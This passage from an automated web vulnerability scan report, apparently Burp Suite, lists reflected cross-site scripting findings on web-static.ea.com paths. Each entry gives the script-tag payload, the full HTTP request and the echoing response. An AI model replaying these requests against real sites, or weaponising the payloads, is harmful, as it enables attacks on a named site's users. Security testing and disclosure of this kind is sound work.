<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/c75d4"><script>alert(1)</script>0fd901df3a2" />
...[SNIP]...

4.124. http://web-static.ea.com/us/portal/images/site_logos/ea_sports.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/ea_sports.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21539"><script>alert(1)</script>24d9a87f4b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/21539"><script>alert(1)</script>24d9a87f4b5?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/21539"><script>alert(1)</script>24d9a87f4b5" />
...[SNIP]...

4.125. http://web-static.ea.com/us/portal/images/site_logos/nfs.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/nfs.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7ed"><script>alert(1)</script>3d841534c94 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/3e7ed"><script>alert(1)</script>3d841534c94?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/3e7ed"><script>alert(1)</script>3d841534c94" />
...[SNIP]...

4.126. http://web-static.ea.com/us/portal/images/site_logos/pogo.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/pogo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e953"><script>alert(1)</script>e7214181ec6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/6e953"><script>alert(1)</script>e7214181ec6?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/6e953"><script>alert(1)</script>e7214181ec6" />
...[SNIP]...

4.127. http://web-static.ea.com/us/portal/images/site_logos/sims.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/sims.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf00"><script>alert(1)</script>8a1fb1ce8fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/fcf00"><script>alert(1)</script>8a1fb1ce8fa?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/fcf00"><script>alert(1)</script>8a1fb1ce8fa" />
...[SNIP]...

4.128. http://web-static.ea.com/us/portal/js/ea/Framework.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/Framework.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c28"><script>alert(1)</script>4871129af1a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/ea/57c28"><script>alert(1)</script>4871129af1a?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/ea/57c28"><script>alert(1)</script>4871129af1a" />
...[SNIP]...

4.129. http://web-static.ea.com/us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba4be"><script>alert(1)</script>9ae99465936 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/ea/ba4be"><script>alert(1)</script>9ae99465936?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30481
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/ea/ba4be"><script>alert(1)</script>9ae99465936" />
...[SNIP]...

4.130. http://web-static.ea.com/us/portal/js/jquery/jquery-1.2.6.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-1.2.6.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68c5"><script>alert(1)</script>c2a6993d28f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/a68c5"><script>alert(1)</script>c2a6993d28f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/a68c5"><script>alert(1)</script>c2a6993d28f" />
...[SNIP]...

4.131. http://web-static.ea.com/us/portal/js/jquery/jquery-1.4.2.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c42"><script>alert(1)</script>f68c539e57e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/42c42"><script>alert(1)</script>f68c539e57e?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/42c42"><script>alert(1)</script>f68c539e57e" />
...[SNIP]...

4.132. http://web-static.ea.com/us/portal/js/jquery/jquery-easing-1.3.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-easing-1.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992d6"><script>alert(1)</script>04ea07e99ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/992d6"><script>alert(1)</script>04ea07e99ad?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/992d6"><script>alert(1)</script>04ea07e99ad" />
...[SNIP]...

4.133. http://web-static.ea.com/us/portal/js/jquery/jquery-facebox-1.2.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-facebox-1.2.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d74d6"><script>alert(1)</script>89130c28a50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/d74d6"><script>alert(1)</script>89130c28a50?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/d74d6"><script>alert(1)</script>89130c28a50" />
...[SNIP]...

4.134. http://web-static.ea.com/us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82fd8"><script>alert(1)</script>6436305a584 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/82fd8"><script>alert(1)</script>6436305a584?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/82fd8"><script>alert(1)</script>6436305a584" />
...[SNIP]...

4.135. http://web-static.ea.com/us/portal/js/jquery/jquery.checkbox.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.checkbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d279"><script>alert(1)</script>6cb44f2e4b0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/1d279"><script>alert(1)</script>6cb44f2e4b0?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/1d279"><script>alert(1)</script>6cb44f2e4b0" />
...[SNIP]...

4.136. http://web-static.ea.com/us/portal/js/jquery/jquery.dynamic-drop.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.dynamic-drop.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc7d8"><script>alert(1)</script>8ca3aee7304 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/fc7d8"><script>alert(1)</script>8ca3aee7304?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:52 GMT
Date: Fri, 24 Jun 2011 13:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/fc7d8"><script>alert(1)</script>8ca3aee7304" />
...[SNIP]...

4.137. http://web-static.ea.com/us/portal/js/jquery/jquery.equalizecols.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.equalizecols.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7f6"><script>alert(1)</script>889bf917fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/ac7f6"><script>alert(1)</script>889bf917fb?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/ac7f6"><script>alert(1)</script>889bf917fb" />
...[SNIP]...

4.138. http://web-static.ea.com/us/portal/js/jquery/jquery.eventcalendar.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.eventcalendar.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a367c"><script>alert(1)</script>ae4ac210b80 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/a367c"><script>alert(1)</script>ae4ac210b80?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

